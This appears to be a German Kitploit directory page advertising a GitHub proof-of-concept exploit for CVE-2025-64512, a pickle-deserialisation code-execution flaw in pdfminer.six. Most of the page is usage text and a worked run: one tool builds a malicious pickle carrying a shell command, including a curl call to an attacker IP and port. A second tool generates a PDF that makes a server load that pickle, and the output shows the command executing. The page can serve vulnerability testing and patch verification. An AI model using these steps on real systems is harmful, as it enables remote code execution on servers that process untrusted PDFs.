Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-64512 — CVE-2025-64512: pdfminer.six Pickle-Deserialisierung RCE; .pickle.gz + PDF-Generator mit benutzerdefinierten Payloads | Kitploit
Tools/GitHubGitHub/matesz44/cve-2025-64512
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubmatesz44/cve-2025-64512

CVE-2025-64512

CVE-2025-64512: pdfminer.six Pickle-Deserialisierung RCE; .pickle.gz + PDF-Generator mit benutzerdefinierten Payloads

Repository anzeigen
414vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-64512 Beliebige Codeausführung in pdfminer.six mittels präparierter PDF-Eingabe PoC

  • basiert auf https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp

% python3 mkpickle.py Usage: mkpickle.py [output] Ex: mkpickle.py 'curl [IP]:[PORT]/rce' evil.pickle.gz

% python3 mkpdf.py -h usage: mkpdf.py [-h] [-o OUTPUT] [-p PATH] [-f] [pickle_name]

Erstellt PDF, das die pickle-Deserialisierung von pdfminer.six auslöst (CVE-2025-64512)

positional arguments: pickle_name Pickle-Dateiname ohne .pickle.gz (Standard: evil)

options: -h, --help Zeigt diese Hilfemeldung an und beendet das Programm -o, --output OUTPUT Ausgabe-PDF-Dateiname (Standard: exploit.pdf) -p, --path PATH Eigener absoluter Pfad zur pickle (ohne .pickle.gz) -f, --fuzz Erzeugt PDFs für alle üblichen absoluten Pfade


python3 mkpickle.py 'touch /tmp/a' evil.pickle.gz [+] evil.pickle.gz (78 bytes) cmd: touch /tmp/a

(lade evil.pickle.gz nach /var/www/html/files/evil.pickle.gz hoch)

python3 mkpdf.py -o ex-poc.pdf -p '/var/www/html/files' evil [+] ex-poc.pdf -> /var/www/html/files/evil.pickle.gz

(lade ex-poc.pdf hoch & warte auf PDF-Verarbeitung / löse sie aus)

ls -l /tmp/a -rw-r--r-- 1 ... ... 0 Jul 19 12:39 a

Tool herunterladen